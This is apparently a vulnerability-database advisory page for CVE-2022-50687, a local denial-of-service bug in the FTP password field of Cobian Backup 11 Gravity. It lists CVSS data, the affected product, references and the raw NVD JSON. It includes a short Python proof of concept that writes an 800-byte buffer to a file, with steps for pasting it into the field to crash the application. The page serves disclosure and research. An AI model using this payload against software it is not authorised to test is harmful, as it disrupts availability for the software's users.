Security Vulnerability Report
CVE-2022-50687 CVSS 5.5 MEDIUM

CVE-2022-50687

Published: 2025-12-22 22:15:59
Last Modified: 2026-01-05 14:15:52

Description

Cobian Backup 11 Gravity 11.2.0.582 contains a denial of service vulnerability in the FTP password input field that allows attackers to crash the application. Attackers can generate a specially crafted 800-byte buffer and paste it into the password field to trigger an application crash.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:cobiansoft:backup_11:11.2.0.582:*:*:*:*:*:*:* - VULNERABLE
Cobian Backup 11 Gravity 11.2.0.582

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2022-50687 PoC - Cobian Backup 11 Gravity FTP Password Field DoS

Description: Generate a specially crafted 800-byte buffer to trigger application crash
when pasted into the FTP password field of Cobian Backup 11 Gravity.
"""


def generate_payload(length=800):
    """Generate a buffer of specified length to trigger the DoS vulnerability."""
    # The payload consists of repeated 'A' characters
    # This triggers a buffer overflow when processed by the password field
    payload = 'A' * length
    return payload


def main():
    print("=" * 60)
    print("CVE-2022-50687 PoC - Cobian Backup 11 Gravity DoS")
    print("=" * 60)

    # Generate the 800-byte payload as described in the vulnerability
    payload = generate_payload(800)

    print(f"\n[+] Generated payload length: {len(payload)} bytes")
    print(f"[+] Payload preview: {payload[:50]}...")

    print("\n[!] Instructions:")
    print("1. Open Cobian Backup 11 Gravity")
    print("2. Navigate to FTP server configuration")
    print("3. Paste the generated payload into the FTP password field")
    print("4. Click OK or Apply to trigger the crash")

    print("\n[+] Payload saved to 'cve_2022_50687_payload.txt'")

    # Save payload to file for easy access
    with open('cve_2022_50687_payload.txt', 'w') as f:
        f.write(payload)


if __name__ == "__main__":
    main()

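References

https://www.cobiansoft.com/ (Product)
https://www.exploit-db.com/exploits/50790 (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/cobian-backup-gravity-local-denial-of-service-via-password-field (Third Party Advisory)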

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50687", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:15:59.277", "lastModified": "2026-01-05T14:15:51.993", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cobian Backup 11 Gravity 11.2.0.582 contains a denial of service vulnerability in the FTP password input field that allows attackers to crash the application. Attackers can generate a specially crafted 800-byte buffer and paste it into the password field to trigger an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cobiansoft:backup_11:11.2.0.582:*:*:*:*:*:*:*", "matchCriteriaId": "09D91121-71F6-4D02-9625-B1EC3AB000BE"}]}]}], "references": [{"url": "https://www.cobiansoft.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50790", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/cobian-backup-gravity-local-denial-of-service-via-password-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50790", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}